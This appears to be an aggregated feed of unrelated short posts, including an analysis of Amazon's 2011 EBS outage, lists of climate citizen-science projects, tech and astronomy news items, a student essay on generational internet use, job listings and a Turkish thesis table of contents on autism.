    Obviously, these mechanisms won’t replace the existing investments but co-reside with focus on collaboration and engagement rather just on plain transactions. This evolution can be seen as part of the progress from paper based communications to email to real time connectivity of minds as against just a process led workflows and system. Mobile devices, video communications, ever increasing bandwidth, multi-lingual support, new forms of enabling technologies like social and in-memory databases all would help the right IT setup for organizations that would put a premium on engagement to deliver better business results.IT Today, in the competitive global business ecosystem cutting across almost all industries, there is an extended value chain that needs to perform efficiently to make business successful and that’s where more and more enablement needs to go – it’s like pouring gas at the tip of the hockey stick curve. We see huge opportunities for the next wave of gains for business with such a focus.

              AWS Outage & Customer Readiness   

    Reddit, Foursquare, EngineYard and Quora were among the many sites that went down recently due to a rather prolonged outage of Amazon's cloud services. On Thursday April 21, When Amazon Elastic Block Store (EBS) went offline, it took many of its Web and database servers depending on that storage down. With Amazon working aggressively to set this back right, on Sunday April 24, most of the services were restored back . As promised and as would be expected, Amazon has now come out with a detailed explanation describing what went wrong, and explaining why the failure was so widely felt and why it took that much time to restore back all the services. Some say that measured against Amazon’s promised availability, this lengthy outage would mean that Amazon may need to maintain full availability for more than a decade to adhere to their promised availability service level commitments.

    Now, let’s examine what happened and how this happened. To start with some basics: Amazon has its facilities spread out around the world. Most users would know that its cloud computing data centers are in five different locations. Virginia, Northern California, Ireland, Singapore, and Tokyo. These centers are so architected that within each of these regions, the cloud services are further separated into what Amazon calls Availability Zone. The availability zones are within themselves self contained with physically and logically separate groups of computers setup therein. Amazon explains that such an arrangement helps customer choose the right level of redundancy as appropriate to their win needs. Such a design with a spectrum of options helps customers choose the right level of robustness also when they for a premium choose to host them in multiple regions. The logic here is that hosting in multiple availability zones within a same region must provide comparable robustness (as in hosting across multiple regions) but would come with a much better economics benefitting the customer.

    Amazon offers several services as part of this arrangement. Amongst those services, Elastic Block Store(EBS) is an important service. With EBS, Amazon provides mountable disk volumes to virtual machines using the more well known Elastic Compute Cloud(EC2). This is quite attractive to customers, as Amazon with this service, provides the virtual machines with huge amount of reliable storage – typically this gets used for database hosting and the like. The powerfulness of this feature can be seen by the fact that while this can be used from EC2, another Amazon feature called Amazon Relational Database Service( RDS) also uses this as a data store. As an added feature for its services, Amazon has designed this feature for high availability purposes and replicates data through EBS between multiple systems. Given the volume and variety involved therein, this process is highly automated. In such an arrangement, if for some reason an EBS node loses connection form its replica, instantly an alternate storage within the same zone is made available to maintain connectivity.

    As per Amazon, while doing routine maintenance operations in Virgnia operations on April 21, engineers were trying to make a change in network configuration to the zone. As part of the process, traffic to the routers affected apparently got moved into a low capacity network as against getting moved onto a backup. The low capacity network, is meant for handling inter node communication and not large scale replication/data transfer internally between the system and so the additional traffic made the network malfunction. With the primary network brought down for maintenance and the secondary network completely mal-functioning the EBS nodes lost their ability to replicate for want of nodes. This is where the unintended consequence of automation began to rear its ugly head. Every system in this network acted as if they are at risk and began to frenetically look for available nodes with free space for replication. While Amazon tried to restore the primary network, damage has been by then done, with all the available space within the cluster were already used, while some remaining nodes continued their search for nodes with free space available – while such nodes with free space were not available.

    With a massive deadlock of nodes trying to find replicas, while there were not nodes with free space, impacted the control system’s performance. The control system performance issue severely impacted execution of new service requests like creating a new volume. A long back up began to get created for the slow control system to act upon and this with time reached catastrophic proportions, with some requests beginning to get returned with fail messages. Now, comes the second but the most crucial part of the outage – unlike other services, the control systems span across the region and not the individual availability zones. The net impact was therefore experienced across different availability zones. Remember the idea of Single Point Of Failure? That was proven here in its full might.

    Slowly and deliberately, Amazon began the course correction – by beginning to tend to the control system and by adding more nodes to the cluster. Over time, the backlogs on the control system began to get cleared and this took painful efforts and a lot of time in the process. Outages of public cloud systems have made news in the past but clearly with time, the body of knowledge and maturity levels ought to improve things. Cloud service providers make high availability as the cornerstone of their offerings but this outage would in many ways, put such claims to question. Even while this outage happened with Amazon Virginia operations, there were many users of AWS, who managed to maintain availability of their system. A majority of those installations had fall back in terms of multiple regions, multiple zone coverage. Such moves necessarily bring cost, complexity equation into consideration.

    It’s a little odd to see that when the problem of non availability of nodes happened, Amazon almost began to get into a denial –of-service attacks within their environment . Amazon now claims that this aspect of crisis related actions have been set right but one may have to wait till next outage to see what else could give way It may be noted that Amazon cloud services suffered a major outage in 2008 – the failure pattern looks somewhat similar upon diagnosis.Clearly, the systems need to operate differently under different circumstances – while it’s normal for nodes to keep replicating on storage/access concerns, the system ought to exhibit different behavior with a different nature of crisis. With the increasing adoption of public cloud services, certainly the volume, complexity and range of workloads would increase and the systems would get tested under varying circumstances for availability and reliability. All business and IT users would seek answers to such questions as they consider moving their workloads onto the cloud

    It is interesting to see how Netflix, a poster user of Amazon cloud services managed to survive this outage. Netflix says,” When we re-designed for the cloud this Amazon failure was exactly the sort of issue that we wanted to be resilient to. Our architecture avoids using EBS as our main data storage service, and the SimpleDB, S3 and Cassandra services that we do depend upon were not affected by the outage”. Netflix admits that their service ran without intervention but with a higher than usual error rate and higher latency than normal through the morning, which is the low traffic time of day for Netflix streaming. Amongst the major engineering decisions that they implemented to avoid such outages includes designing things as stateless applications and maintain multiple redundant hot copies of the data spread across zones. Netflix calls their solution –“ Cloud Solutions for the Cloud” as the claim here is that instead of fork-lifting the existing applications from their data centers to Amazon's and simply using EC2, with their approach they believe that they have fully embraced the cloud paradigm. Essentially, Netflix has automated its zone fail-over and recovery process, hosted its services in multiple regions while reducing its dependence on EBS.

    Clearly there are ways to get the best of cloud – except that some of these may have different economics and would call for greater ability to engineer and manage the operations. Amazon may have to increase the level of transparency in terms of their design and the operational metrics need to cover many more areas of operations as against the narrow set of metrics that users get to see now. To sum up , I would hesitate to call AWS as failure of the cloud but this journey into the cloud would call for more preparation and better thought out design to be in place from user’s side.

              Citizen Science: Climatology for Everyone   
    Citizen Science: Climatology for Everyone

    With recent posts addressing personal action in the fight to combat global warming, I thought it would be interesting to dedicate a post to ways in which the average citizen can help global warming by directly contributing to our scientific understanding of it. That is, becoming a ‘citizen scientist’.

    Citizen science projects date back hundreds of years, with many of the first projects involving citizens keeping track of wildlife populations. The Audubon Christmas Bird Count is perhaps the most famous in the United States and dates back to 1900. With help from the internet, and a growing recognition of the value that citizens are capable of contributing, citizen science projects have been rapidly growing.

    The range of subjects that are covered by citizen science projects is vast. Here are just a few of them, which directly relate to climate change:
    Computational projects
    The majority of activities that we use our computers for actually require less than 1% of our computer’s available processing power. Using one of today's new computers to browse the internet is like using a forklift to hang a potted plant. Why not get the most out of that expensive hardware under the hood, by putting it to work to help the planet?

    Climateprediction.net – Using the popular BOINC grid computing software, allows you to harness unused processing power to run global climate models on your home computer. Several scientific papers have already been published based on results from the project.

    The Clean Energy Project – Part of IBM’s World Community Grid, and also running on the BOINC platform, it uses the powerful Q-Chem® quantum chemistry software to explore new molecular structures for use in potential low-cost “organic” solar panels.

    Hydrogen@home – A new project, similar to the Clean Energy Project, but seeks new ways to create and store hydrogen as part of a clean fuel economy.

    The projects listed above may be considered 'passive' citizen science, in that they don't require any real effort to carry out. Once you download and get the software running to your preferences, you can essentially ‘set it and forget it’. The software is fully customizable with respect to how much of your processor/memory you want to allocate to the projects, when the computations run, and which projects you would like to contribute to (if climate science isn't your greatest passion, there are several other projects out there ranging from the search for aliens to discovering new protein folding techniques.)

    Active Participation
    For those who are motivated to do a bit more, there are many 'active' participation projects out there. Some of these can be quite involved, but typically don't require any minimum time commitment--work as often as you like and as hard as you like.
    Old Weather – Read old navy logbooks and digitize their historic weather information, in order to gain a better understanding of past weather and climate patterns and enhance the accuracy of modern day predictions. A talent for reading handwriting is required.

    Data rescue at home – Similar to Old Weather but with a wider range of sources, involves digitizing handwritten atmospheric conditions for computational analysis. Currently working on German radiosonde data from WWII.
    CoCoRaHS (USA) —Measuring precipitation in “your backyard”, with the goal of creating an ongoing, ultra-high resolution data set of precipitation events, which will contribute to scientific understanding of weather and climate patterns.

    Opal Climate Survey (England) – Requests that citizens observe and report several climate factors, such as aircraft contrails and wind speed. Related surveys such as air quality and biodiversity are also featured.
    Students’ Cloud Observations On-Line – A NASA program, geared towards kids but with the very important purpose of cross-checking satellite cloud measurements. Students visually classify clouds by altitude, type, cover percentage, and opacity.
    Surfacestations.org (USA) – Seeks volunteers to photographically document the status of official temperature stations throughout the United States.
    ClimateWatch (Australia) – Track populations of an insect, animal or plant species through time within a certain region, to better understand how the biosphere reacts to climate change and other long term trends.
    ClimateWatch is similar in nature to the earliest type of citizen science project discussed above, that of keeping track of species number and behavior in their natural environment (formally known as phenology). While most do not officially take tracking climate change to be their primary goal, there is no doubt that this data will be helpful in tracking how the biosphere is reacting in response to regional or global climate forcings. Knowing how the natural world will react to a rapid climate shift lists among the biggest and most important uncertainties still plaguing climate predictions, and lack of data is a limiting factor. Imagine how much more informed our policy actions could be if we knew exactly how populations and behaviors of all of the key species on earth were trending.

    There are hundreds of similar projects involving tracking the natural world; it is almost certain you will be able to find one involving whichever plant, animal, or insect species you may especially hold dear. Many of these projects can be found at the excellent database for citizen science projectsscienceforcitizens.net. There are even iPhone apps to let you participate on the go.

    So why not start giving scientists a hand? Virtually anyone, including kids, can get involved in these projects and know they are making a real difference. Many feature some kind of participation-based points system for fun and to encourage some friendly competition. And they can also be a great way to meet people—whether your passion lies in developing clean energy to save the world, or simply the intricacies of the swallowtail’s mating cycle, there is no shortage of passionate citizens out there working hard to improve our scientific understanding of the natural world.

    Green Internet Consultant. Practical solutions to reducing GHG emissions such as free broadband and electric highways. http://green-broadband.blogspot.com/
    email: Bill.St.Arnaud@gmail.com
    twitter: BillStArnaud
    blog: http://billstarnaud.blogspot.com/
    skype: Pocketpro
              Cool new Middleware from Twitter for distributed data   

    "Twitter last night offered up the code for Gizzard, an open-source framework for accessing distributed data quickly, which Twitter built to help the site deal with the millions of requests it gets from users needing access to their friends and their own tweets. It could become an important component of building out web-based businesses, much likeFacebook’s Cassandra project has swept through the ranks of webscale startups and even big companies.
    Gizzard is a middleware networking service that sits between the front-end web site client and the database and attempts to divide and replicate data in storage in intelligent ways that allows it to be accessed quickly by the site. Gizzard’s function it to take the requests coming in through the fire hose and allocate the stream of requests across multiple databases without slowing things down. It’s also fault-tolerant, which means if one section of data is compromised, the service will try to route to other sections. From the Twitter blog post:"
              Citizen Science - how you can make a contribution to study of climate change   
    [From Climate Progress - “the indispensable blog” — Tom Friedman, New York Times –BSA]


    Online social networking is no longer just about tagging a picture of your dog on Facebook or announcing to the world what you’re having for dinner on Twitter. Scientific institutions worldwide are beginning to harness the power of online social networking for scientific research. Online communities are an ideal vehicle for matching professional scientists with armies of enthusiastic amateurs. This corps of citizen scientists has the capacity to capture far more data over a vastly expanded geographical spectrum than professional scientists can on their own.
    The USA National Phenology Network is one organization that is reaching out to citizen scientists via the Internet. People have used phenology, the study of the timing of lifecycle events of plants and animals, to detect the signs of spring since the early 18th century. The rising threat posed by global warming has spurred scientists to put phenology to another use: to detect the signs of climate change.
    Plants and animals are very sensitive to even the smallest changes in their climates. Shifts in the timing of their lifecycle events can therefore be an important indicator in the study of climate change and its effects. Slight changes can have huge repercussions; mutual relationships between species and even entire systems can begin to fall apart.
    USA-NPN is asking people across the country to record the phenology of their local flora and then report it online. Amateur hikers and photographers can also participate in NPN’s Project Budburst. They are asked to identify the phenological stage of the flowers and plants they see using information provided by the project’s website. The participants record the location, longitude, and latitude of what they observe. Eventually, Project Budburst will use this information to include real-time mapping with Google maps.
    Relying on anonymous volunteers to collect data that will be entered into important scientific databases certainly raises questions about the reliability of the information gathered. Yet it turns out that most of the data is remarkably accurate, and researchers do perform checks on anomalous data. What’s more, the large pool of samples collected by a large group of volunteers diminishes the impact of any faulty data.
    This creative new use for social networking also answers critics’ accusations about the frivolity of Facebook, Twitter, and other sites with proof that online networking has the potential to mobilize users to actively participate in innovative programs. Jack Weltzin, executive director of NPN, has said that in the future NPN hopes to make it possible for people to submit their findings via Twitter. NPN, a nonprofit organization, also hopes that iPhone and Facebook applications might be created to more easily facilitate volunteer participation.
    Climate change scientists are not the only members of the scientific profession to tap into the potential of these online communities. In addition to tracking climate change, the information participants collect can help scientists predict wildfires and pollen production and monitor droughts as well as detect and control invasive species. Other online projects, such as “The Great World Wide Star Count,” rely on volunteer participation to gauge the level of light pollution across the globe. Several websites are also dedicated to tracking the migratory and breeding patterns of animals such as birds, frogs, and butterflies. All of these observations will augment the databases available to scientists attempting to understand annual fluctuations.
              Science 2.0: New online tools may revolutionize research   
    [Excellent article on how Web 2.0 tools are transforming science. The 2 projects mentioned have been funded by CANARIE in the latest NEP program amongst a total of 11 similar projects . For more examples of how web 2.0 is revolutionizing science please see my Citizen Science Blog. Thanks to Richard Ackerman for some of the FriendFeed pointers. Some excerpts from CBC website– BSA]


    Citizen Science

    CANARIE NEP program

    Described as an extension of the internet under the ocean, the Venus Coastal Observatory off Canada's west coast provides oceanographers with a continuous stream of undersea data once accessible only through costly marine expeditions. When its sister facility Neptune Canada launches next summer, the observatories' eight nodes will provide ocean scientists with an unprecedented wealth of information.
    Sifting through all that data, however, can be quite a task. So the observatories, with the help of CANARIE Inc., operator of Canada's advanced research network, are developing a set of tools they call Oceans 2.0 to simplify access to the data and help researchers work with it in new ways. Some of their ideas look a lot like such popular consumer websites as Facebook, Flickr, Wikipedia and Digg.
    And they're not alone. This set of online interaction technologies called Web 2.0 is finding its way into the scientific community.
    Michael Nielsen, a Waterloo, Ont., physicist who is working on a book on the future of science, says online tools could change science to an extent that hasn't happened since the late 17th century, when scientists started publishing their research in scientific journals.
    One way to manage the data boom will involve tagging data, much as users of websites like Flickr tag images or readers of blogs and web pages can "Digg" articles they approve. On Oceans 2.0, researchers might attach tags to images or video streams from undersea cameras, identifying sightings of little-known organisms or examples of rare phenomena.
    The Canadian Space Science Data Portal (CSSDP), based at the University of Alberta, is also working on online collaboration tools. Robert Rankin, a University of Alberta physics professor and CSSDP principal investigator, foresees scientists attaching tags to specific data items containing occurrences of a particular process or phenomenon in which researchers are interested.
    "You've essentially got a database that has been developed using this tagging process," he says.
    If data tagging is analogous to Flickr or Digg, other initiatives look a bit like Facebook.
    Pirenne envisions Oceans 2.0 including a Facebook-like social networking site where researchers could create profiles showing what sort of work they do and what expertise they have. When a scientist is working on a project and needs specific expertise — experience in data mining and statistical analysis of oceanographic data, for example — he or she could turn to this facility to find likely collaborators.
    "It's a really exciting time," Lok says, "a really active time for Science 2.0."

    it got lots of buzz on FriendFeed, there are multiple mentions of it



    (The conference Eva's referring to is Science Online 2009.)






              Many eyes   
    From the New York Times -- >

    Lines and Bubbles and Bars, Oh My! New Ways to Sift Data By Anne Eisenberg

    PEOPLE share their videos on YouTube and their photos at Flickr. Now they can share more technical types of displays: graphs, charts and other visuals they create to help them analyze data buried in spreadsheets, tables or text.

    At an experimental Web site, Many Eyes, (www.many-eyes.com), users can upload the data they want to visualize, then try sophisticated tools to generate interactive displays. These might range from maps of relationships in the New Testament to a display of the comparative frequency of words used in speeches by Senators Hillary Rodham Clinton and Barack Obama.

    The site was created by scientists at the Watson Research Center of I.B.M. in Cambridge, Mass., to help people publish and discuss graphics in a group. Those who register at the site can comment on one another's work, perhaps visualizing the same information with different tools and discovering unexpected patterns in the data.

    Collaboration like this can be an effective way to spur insight, said Pat Hanrahan, a professor of computer science at Stanford whose research includes scientific visualization. "When analyzing information, no single person knows it all," he said. "When you have a group look at data, you protect against bias. You get more perspectives, and this can lead to more reliable decisions."

    The site is the brainchild of Martin Wattenberg and Fernanda B.
    Viégas, two I.B.M. researchers at the Cambridge lab. Dr. Wattenberg, a computer scientist and mathematician, says sophisticated visualization tools have historically been the province of professionals in academia, business and government. "We want to bring visualization to a whole new audience," he said — to people who have had relatively few ways to create and discuss such use of data.

    "The conversation about the data is as important as the flow of data from the database," he said.

    The Many Eyes site, begun in January 2007, offers 16 ways to present data, from stack graphs and bar charts to diagrams that let people map relationships. TreeMaps, showing information in colorful rectangles, are among the popular tools.

    Initially, the site offered only analytical tools like graphs for visualizing numerical data. "The interesting thing we noticed was that users kept trying to upload blog posts, and entire books," Dr. Viégas said, so the site added techniques for unstructured text. One tool, called an interleaved tag cloud, lets users compare side by side the relative frequencies of the words in two passages — for instance, President Bush's State of the Union addresses in 2002 and 2003.

    Almost all the tools are interactive, allowing users to change parameters, zoom in or out or show more information when the mouse moves over an image, Dr. Wattenberg said.

    Users can embed images and links to their visualizations in their Web sites or blogs, just as they can embed YouTube videos. "It's great that people can paste in a YouTube video of cats" on their blogs, Dr.
    Viégas said. "So why not a visual that gives you some insight into the sea of data that surrounds us? I might find one thing; someone else, something completely different, and that's where the conversation starts."

    Rich Hoeg, a technology manager who lives in New Hope, Minn., and has a blog at econtent.typepad.com, was so taken with the possibilities for group collaboration that he wrote a tutorial on using Many Eyes as part of his series called "NorthStar Nerd Tutorials."

    [snip]RSS Feed:
              Comm 385: Generation GAP (week 7)   

    Not the jeans.

    Seriously, this will have nothing to do with GAP jeans, and the propensity of teen girls to cry desperately to their mother to buy them this particular brand of clothing. Maybe I am out of touch however, since my last image of this was 19 years ago while I watched my two sisters nearly pass out in hysterics over this issue. Maybe now its Abocrombie and Fitch. Maybe Old Navy. I just don't know.

    But I am going to be talking (writing) about a 'gap' (notice the lowercase, and lack of any trademark). Why is it important that I distinguish between this, I mean, 'gap' has always meant or been defined as a break or hole in an object or between two objects'. Not always has the word been associated with a midrange clothing store. But today I am discussing an interview with three different friends of mine... and the word 'gap' is going to be very important. 

    The intent was to interview three age groups. Without getting into specifics: young, middle-aged and old. Why no specifics - because there is a difference in mindset which does not necessarily translate based on age alone. It would have been a matter of triviality to find someone in each given age group who thought and used the internet (our topic de jour) in ways purportedly of another age. Good friends slightly older, hitting that middle group who are fascinated with each piece and parcel of online connectivity, young people too distracted by hormones to care what a blinking box does... no, I separate not by the actual age, but by their general age group. Someone who identifies themselves as middle aged, someone who thinks (and is) far too young for their own good, and someone who considers youth a thing long past. That, and besides the youngest interviewee, nobody wanted their age mentioned. Natch (slang for naturally- I picked it up from, of all things, Frosty the Snowman as read by Jimmy Durante).

    The youngest of the trio, a late teenish friend from OSU. To her, the internet is her lifeline. Far from home, the internet is her communication tool for maintaining relationships across the country. Daily she chats with her mother over Skype, teases her boyfriend over IM, and updates her friends via MySpace. Like a "personal assistant", her computer serves her every need - from classwork to shopping, from friends to entertainment; her trusted Dell works through it all. It is on at all hours, and her most frequent companion when running around town or class. "If I don't have my laptop, it's like my world is much smaller". She also finds that she is not sure she would have come all the way out to Oregon if it weren't for the internet - she only even applied to OSU due to finding it online. 

    Without the same enthusiasm, the internet is greeted by my 'middle aged' friend, who found being labelled middle aged far more disturbing than the potential loss of internet access. "It's a tool... plan and simple. I use it alot (sic), but don't trust it necessarily". Much more embattled, he indicates that the internet is very easy and straightforward to use, but that he just doesn't see the need to use it for everything. "A phone call is better" he explains, (which doesn't explain why I had to email him these questions). He indicated he shopped a lot, used email heavily but rarely chatted online, and didn't bother with social connectivity sites. When asked about his level of comfort using the internet, he wrote back a fairly long diatribe about user interface design and people making things unnecessarily complicated. He then lambasted me a bit (in good fun) for not specifying which application, since the internet is a global connected computer infrastructure, and not a specific tool one would use. He never actually answered, but based on his technical skills, I would say pretty comfortable.

    Lastly, I asked an old timer here at work. Forced to use the internet due to the demands of modern educational infrastructure, he wasted no time at all complaining about the lack of personal connection, the inefficiency of email and the idiocy of thinking that everything one sent out on the internet would always arrive. He told tales of people who would call, asking 'Did you get my email' which had been sent just a few minutes ago. He also complained loudly at the requirements to do so many things online nowadays, lamenting when taxes used to be so much simpler to file. "What in the heck has happened to stamps!' he quipped at me several times. Now, to be fair, I chose him to interview because I know how much he dislikes the "damned paperweight on my desk". So, much of this I expected. But I think he is a fair example of someone who had done a job for 35 years before having the paradigm of operation change on him virtually overnight. Only one door down can be found the next generation of scientific researcher - office cluttered with multitudes of powerful computers. The aged researcher complains of the noise and heat generated, and heads down to get more coffee, his email unread in the background. I sit around for a bit before I realize that he isn't coming back all that quickly, and leave - noticing that he has gotten into a debate about space usage with the Director out here, and indicating that he had no intention of trying to send a map of his lab space via email. He retires in a few months, so I think my boss is fighting a losing battle. 

    Three age groups. I can't help but thing of those who had horses at the early part of the 20th century. Doomed by the advent of the modern automobile, their children would consider horses but a farm tool... to their grandchildren, a pet...  while to the last horsemen it was their essential means of travel and a trusted companion. So too has the internet changed our society. Age has little to do with the barrier of connectivity, but it could be said that the propensity to learn new things versus the comfort of tradition influences participation online as much as anything else. My father sends me photos, but can't seem to write more than a word or two via email. My mother, younger, a bit more but it falls to my sisters to actually communicate online with me from time to time. I imagine my daughter will grow up in a world where snail mail is becoming a distant memory, where email is the tool of the 'older' generation, and direct video conferencing via Skype or its replacement is the common paradigm. She will never understand the hesitance of phone calls due to long distance charges, never not be exposed to up to the minute' video recordings of major news events catalogued in massive searchable databases. Even TV, long a staple of defined dates and times is now falling - swept aside by the on demand video and time-shifting recording devices. I realize only now, she will never have seen a dial knob on a TV. Weird.

    I make my living supporting technology. I live and die with online innovation - Apple saves me months of frustration, Vista loses me those same months. In my lifespan, I have seen the emergence of the home computer market. I was born near the same time as Apple and Microsoft... with them I have clothed myself, fed myself and bought many a pastel fruit drink guys are supposed to be embarrassed to buy. I see the generational gap (finally, I use the word again) defined so clearly from age to age. Each individual defining their age differently, yet each individual fitting so neatly into a usage category - each defined by not only how, but why we are online. The 'net pervades our lives now. From taxes, to shopping, to dating, to relationships and connections. The flow of data from one point to another finds a path of least resistance among us all. For some, this age will nearly pass us by... for others, we are drowned in the electronic noise. Is it fair to say one group stereotypically defines usage?  ...No, but we can point to trends. Younger people have grown up with these tools being the only known way of communicating, so for them it is essential. The older generation have been shown another way, yet move to the point of most effectiveness individually. 

    Lastly, some of them just think its too damned annoying and want us to get the internet the hell off their lawn. Yes... yes... yes... sorry, it was just a wifi hotspot. :-)

              Jr. Database Administrator   
    IL-Deerfield, Job Role/Requirements: Provide first level Support and maintain SAP ASE and MS SQL Server database environment. Build database structures based on detailed design. Performs database testing to ensure performance is met and compare with expected results. Provides support during the system implementation and production. Identifies gaps in scripts and procedures. Develop and implement best practice p
              Dune Redux   

    Today on the 5: There is a new revision of a popular fanedit of the David Lynch film Dune. This new edit, Dune The Alternative Edition Redux, was recently released. Having watched it, it now stands as the definitive version of one of my favorite films.

              LSST Receives $30 Million   
    Via Interactions.Org

    LSST Receives $30 Million from Charles Simonyi and Bill Gates

    The Large Synoptic Survey Telescope (LSST) Project is pleased to announce receipt of two major gifts: $20M from the Charles Simonyi Fund for Arts and Sciences and $10M from Microsoft founder Bill Gates.

    Under development since 2000, the LSST is a public-private partnership. This gift enables the construction of LSST's three large mirrors; these mirrors take over five years to manufacture. The first stages of production for the two largest mirrors are now beginning at the Mirror Laboratory at the University of Arizona in Tucson, Arizona. Other key elements of the LSST system will also be aided by this commitment.

    The LSST exemplifies characteristics Simonyi and Gates have exhibited in their successful lives and careers – innovation, excitement of discovery, cutting edge technology, and a creative energy that pushes the possibilities of human achievement. The LSST leverages advances in large telescope design, imaging detectors, and computing to engage everyone in a journey of cosmic discovery.

    Proposed for "first light" in 2014, the 8.4-meter LSST will survey the entire visible sky deeply in multiple colors every week with its three-billion pixel digital camera, probing the mysteries of Dark Matter and Dark Energy, and opening a movie-like window on objects that change or

    "This support from Charles Simonyi and Bill Gates will lead to a transformation in the way we study the Universe," said University of California, Davis, Professor and LSST Director J. Anthony Tyson. "By mapping the visible sky deeply and rapidly, the LSST will let everyone
    experience a novel view of our Universe and permit exciting new questions in a variety of areas of astronomy and fundamental physics."

    The LSST will be constructed on Cerro Pachón, a mountain in northern Chile. Its design of three large mirrors and three refractive lenses in a camera leads to a 10 square degree field-of-view with excellent image quality. The telescope's 3200 Megapixel camera will be the largest digital camera ever constructed. Over ten years of operations, about 2000 deep exposures will be acquired for every part of the sky over 20,000 square degrees. This color "movie" of the Universe will open an entirely new window: the time domain. LSST will produce 30 Terabytes of data per night, yielding a total database of 150 Petabytes. Dedicated data facilities will process the data in real time.

    "What a shock it was when Galileo saw in his telescope the phases of Venus, or the moons of Jupiter, the first hints of a dynamic universe" Simonyi said. "Today, by building a special telescope-computer complex, we can study this dynamism in unprecedented detail. LSST will produce a database suitable for answering a wide range of pressing questions: What is dark energy? What is dark matter? How did the Milky Way form? What are the properties of small bodies in the solar system? Are there potentially hazardous asteroids that may impact the earth causing significant damage? What sort of new phenomena have yet to be discovered?"

    "LSST is just as imaginative in its technology and approach as it is with its science mission. LSST is truly an internet telescope, which will put terabytes of data each night into the hands of anyone that wants to explore it. Astronomical research with LSST becomes a software issue - writing code and database queries to mine the night sky and recover its secrets. The 8.4 meter LSST telescope and the three gigapixel camera are thus a shared resource for all humanity - the ultimate network peripheral device to explore the universe" Gates said. "It is fun for Charles and me to be a team again supporting this work given all we have done together on software projects."

    "The LSST will be the world's most powerful survey telescope. This major gift keeps the project on schedule by enabling the early fabrication of LSST’s large optics and other long-lead components of the LSST system," said Donald Sweeney, LSST Project Manager.

    LSST is designed to be a public facility - the database and resulting catalogs will be made available to the community at large with no proprietary restrictions. A sophisticated data management system will provide easy access, enabling simple queries from individual users (both professionals and amateurs), as well as computationally intensive scientific investigations that utilize the entire database. The public will actively share the adventure of discovery of our dynamic Universe.

    More information about the LSST including current images, graphics, and
    animation can be found at http://www.lsst.org

    In 2003, the LSST Corporation was formed as a non-profit 501(c)3 Arizona corporation with headquarters in Tucson, AZ. Membership has since expanded to twenty two members including Brookhaven National Laboratory, California Institute of Technology, Columbia University, Google Inc., Harvard-Smithsonian Center for Astrophysics, Johns Hopkins University, Kavli Institute for Particle Astrophysics and Cosmology - Stanford University, Las Cumbres Observatory Global Telescope Network, Inc., Lawrence Livermore National Laboratory, National Optical Astronomy Observatory, Princeton University, Purdue University, Research Corporation, Stanford Linear Accelerator Center, The Pennsylvania State University, The University of Arizona, University of California, Davis, University of California at Irvine, University of Illinois at Urbana-Champaign, University of Pennsylvania, University of Pittsburgh, and the University of Washington.

              Army Reveals Afghan Biometric ID Plan; Millions Scanned, Carded by May    
    President Hamid Karzai has yet to sign on. But the “Afghan Ministry of Communications and Information Technology has already secured a $122 million contract for the database development and printing of cards in support of that plan,” Osbourne adds.
              By: GregJ   
    Seems that the main issue with "YaST" is actually with "yast sw_single" and it's reading of cached package info. Seems since RAM is dirt cheap these days and my /var/lib/zypp directory is only 93M, the simplest solution is to daemonize zypper and replace it with a command passing script. With a "quit" command to unlock the RPM database this might take a few hours to implement. This plus a nightly cron job to run "zypper ref" and an /etc/zypp/zypp.conf with repo.refresh.delay = 1440 # 60 * 24 min Of course, this ignores zypper's key handling, and a way to force a refresh...
              Senior Java Engineer - Talener - Los Angeles, CA   
    Required Skills6+ Years of Java ExperienceJMS / Queuing /Messaging experience – Artemis Preferred (open to ActiveMQ, RabbitMQ &amp; KafkaMQ)Relational Databases...
    From Dice - Wed, 07 Jun 2017 14:20:20 GMT - View all Los Angeles, CA jobs

    Tez Danısmanı:
    Prof. Dr. Akile GÜRSOY
    Antropoloji Bölümü Yüksek Lisans Derecesi Đçin Sosyal Bilimler Enstitüsü’ne Sunulmustur.
    Đstanbul, 2007
    KISALTMALAR LĐSTESĐ………………………………………………………………..........V
    TABLOLAR LĐSTESĐ……………………………………………………………….......VI - VII
    SEKĐLLER LĐSTESĐ…………………………………………………………………............VIII
    RESĐMLER LĐSTESĐ…………………………………………………………………………..IX
    FOTOĞRAFLAR LĐSTESĐ………………………………………………………………..........X
    1. GĐRĐS………………………………………………………………………………………..… 1
    1.1. Otizm……………………………………………………………………………………… 1
    1.1.1. Otizmin Tanımı…………………………………………………………………….. 2
    1.1.2. Tarihçesi……………………………………………………………………………. 3
    1.1.3. Türleri / Sınıflandırma…………………………………………………………....... 4
    1.1.4. Görülme Sıklığı…………………………………………………………………..... 7
    1.1.5. Nedenleri………………………………………………………………………….... 8
    1.1.6. Tanı ve Teshis…………………………………………………………………….... 11
    1.1.7. Tedavi…………………………………………………………………………….... 13
    1.1.8. Eğitim………………………………………………………………………………. 20
    1.2. Türkiye’de Otizm…………………………………………………………………………. 25
    1.2.1. Tarihçe……………………………………………………………………………... 30
    1.2.2. Đlgili Kurum ve Kuruluslar………………………………………………………….36
    1.2.3. Đlgili Yasal Düzenlemeler………………………………………………………….. 39
    1.3. Otizm ve Toplum………………………………………………………………………..… 41
    1.3.1. Aile…………………………………………………………………………………. 44 Aile – Eğitimci Đliskisi……………………………………………………....... 46 Sosyo-Ekonomik Özellikler………………………………………………….. 47
    1.3.2. Sosyal Çevre……………………………………………………………………….. 47
    1.3.3. Medya…………………………………………………………………………….... 52
    1.3.4. “Marjinalite”, “Anormallik” ve Türk Toplumunda Otizm..........……………...….. 66 “Marjinalite” ve “Anormallik”………………..…..…………………………. 66 “Marjinalite” ve “Anormallik” Kavramları Isığında Türk Toplumunda Otizm 69
    1.4. Arastırmanın Odak Noktası……………………………………………………………..… 78
    1.5. Arastırmanın Amacı……………………………………………………………………….. 79
    1.6. Arastırmanın Önemi……………………………………………………………………..... 80
    2. ARASTIRMANIN YÖNTEMĐ……………………………………………………………… 81
    2.1.Örneklem ve Arastırılacak Örnek Vaka’nın Belirlenmesi………………………………… 81
    2.2.Arastırmada Kullanılan Yöntem ve Teknikler……………………………………………. . 82
    2.3.Arastırmanın Etik Boyutu………………………………………………………………….. 83
    2.3.1. Antropolojide Etik Kurallar…………………………………………………………. 83
    2.3.2. Arastırmada Karsılasılan Etik Kaygılar………………………………………........... 85
    2.3.3. Kisisel Tanıtım Bildirisi………………………………………………………….….. 86
    2.4.Arastırmanın Takvimi ve Zamanlama………………………………………………………87
    3. BULGULAR………………………………………………………………………………….. 88
    3.1. Örnek Vaka : Zarif………………………………………………………………………... 88
    3.2. Zarif’in Aile Yapısı……………………………………………………………………….. 92
    3.3. Zarif’in Sosyal Çevresi…………………………………………………………………… 97
